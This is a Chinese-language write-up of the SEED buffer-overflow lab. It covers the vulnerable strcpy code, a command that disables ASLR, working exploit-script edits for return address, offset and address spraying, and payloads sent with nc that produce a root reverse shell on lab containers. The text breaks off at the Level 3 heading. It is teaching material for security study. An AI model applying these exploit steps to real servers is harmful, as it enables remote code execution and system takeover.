SEED(2)-缓冲区溢出攻击(Buffer-OverflowAttack)
1. 漏洞原理
漏洞代码⽰例:
#include<string.h>
void foo(char *str)
{
char buffer[12];
strcpy(buffer, str);
}
int main()
{
char *str = "This is definitely longer than 12";
foo(str);
return 1;
}
当把str的内容copy到buffer中,由于str的长度⼤于12,就会造成缓冲区buffer的溢出,str中多出的部分会存放在缓冲区的上⽅,我们的⽬的就是将代码植⼊到此处,然后让函数的return Address指向我们存放代码的地址A来执⾏code!
A:code的起始地址
Nop:指令为0x90,执⾏该指令时什么都不做,⼀直往下执⾏。(在code与foo()之间填满Nop,便于找到地址A,return Address⼀旦指向其中⼀个Nop,就会执⾏到code的地址A)
2. 实验准备
进⼊到/Buffer_Overflow/Labtup/rver-code路径下,执⾏:
$ make
$ make install
$ cd .. #进⼊/Labtup⽬录
$ dcbuild
$ dcup
关闭防范机制:memory randomization
$ sudo sysctl -w kernel.randomize_va_space=0
3. Level 1 Attack:Get the Parameters(获取参数)
$ echo hello | nc 10.9.0.5 9090
^C
若执⾏两次打印出的结果⼀致且输出地址为0xffffxxxx,则说明memory randomization已关闭;Container Console
rver-1-10.9.0.5 | Got a connection from 10.9.0.1
rver-1-10.9.0.5 | Starting stack
rver-1-10.9.0.5 | Input size: 6
rver-1-10.9.0.5 | Frame Pointer (ebp) inside bof(): 0xffffd108
rver-1-10.9.0.5 | Buffer's address inside bof(): 0xffffd098
rver-1-10.9.0.5 | ==== Returned Properly ====
rver-1-10.9.0.5 | Got a connection from 10.9.0.1
rver-1-10.9.0.5 | Starting stack
rver-1-10.9.0.5 | Input size: 6
rver-1-10.9.0.5 | Frame Pointer (ebp) inside bof(): 0xffffd108
rver-1-10.9.0.5 | Buffer's address inside bof(): 0xffffd098
rver-1-10.9.0.5 | ==== Returned Properly ====
$ cd /Buffer_Overflow/Files
$ vim exploit-L1.py
然后利⽤ebp 和 Buffer address 计算A的地址(ret)和offt:
ret(A) = 0xffffd108 + 8(min(A) = ebp + 8;max(A) = 517 - len(code))
offt = 0xffffd108 - 0xffffd098 + 4 = 116(⼗进制)
修改exploit-L1.py中ret和offt的值并保退出;然后运⾏:
$ python3 exploit-L1.py
$ cat badfile | nc 10.9.0.5 9090
Container Console
rver-1-10.9.0.5 | Got a connection from 10.9.0.1
rver-1-10.9.0.5 | Starting stack
rver-1-10.9.0.5 | Input size: 517
rver-1-10.9.0.5 | Frame Pointer (ebp) inside bof(): 0xffffd428
rver-1-10.9.0.5 | Buffer's address inside bof(): 0xffffd3b8
rver-1-10.9.0.5 | (^_^) SUCCESS SUCCESS (^_^)
若出现上⾯'(^_^) SUCCESS SUCCESS (^_^)',说明成功!
Get Revere Shell
修改exploit-L1.py⽂件ret和A的值:
################################################################## # Put the shellcode at the end
content[517-len(shellcode):] = shellcode
# You need to find the correct address
# This should be the first instruction you want to return to
ret = 0xffffd428+40
# You need to calculate the offt
offt = 116
L = 4 # U 4 for 32-bit address and 8 for 64-bit address
content[offt:offt + L] = (ret).to_bytes(L,byteorder='little')
##################################################################新建⼀个命令⾏窗⼝输⼊$ nc -lnv 7070开启监听
在另外⼀个窗⼝向rver发送badfile⽂件
$ python3 exploit-L1.py
$ cat badfile | nc 10.9.0.5 9090
监听窗⼝输出以下内容,说明成功获取Revere Shell;
Listening on 0.0.0.0 7070
Connection received on 10.9.0.5 51582
root@ec5152748270:/bof#
4. Level 2 Attack : Buffer Size Unknown
$ echo hello | nc 10.9.0.6 9090
^C
Container Console
rver-2-10.9.0.6 | Got a connection from 10.9.0.1
rver-2-10.9.0.6 | Starting stack
rver-2-10.9.0.6 | Input size: 6
rver-2-10.9.0.6 | Buffer's address inside bof(): 0xffffd368
rver-2-10.9.0.6 | ==== Returned Properly ====
修改exploit-L2.py⽂件ret和S的值:
S:ref的个数 = buffersize/4(⼀个ref为4字节)
ret:BufferAddress + buffersize
################################################################## # Put the shellcode at the end of the buffer
content[517-len(shellcode):] = shellcode
# You need to find the correct address
# This should be the first instruction you want to return to
ret = 0xffffd368+360
# Spray the buffer with S number of return address
# You need to decide the S value
S = 90
for offt in range(S):
content[offt*4:offt*4 + 4] = (ret).to_bytes(4,byteorder='little')
##################################################################
$ python3 exploit-L2.py
$ cat badfile | nc 10.9.0.6 9090
Container Console
rver-2-10.9.0.6 | Got a connection from 10.9.0.1
rver-2-10.9.0.6 | Starting stack
rver-2-10.9.0.6 | Input size: 517
rver-2-10.9.0.6 | Buffer's address inside bof(): 0xffffd368
rver-2-10.9.0.6 | (^_^) SUCCESS SUCCESS (^_^)
5. Level 3 Attack: 64-bit Server
原理:
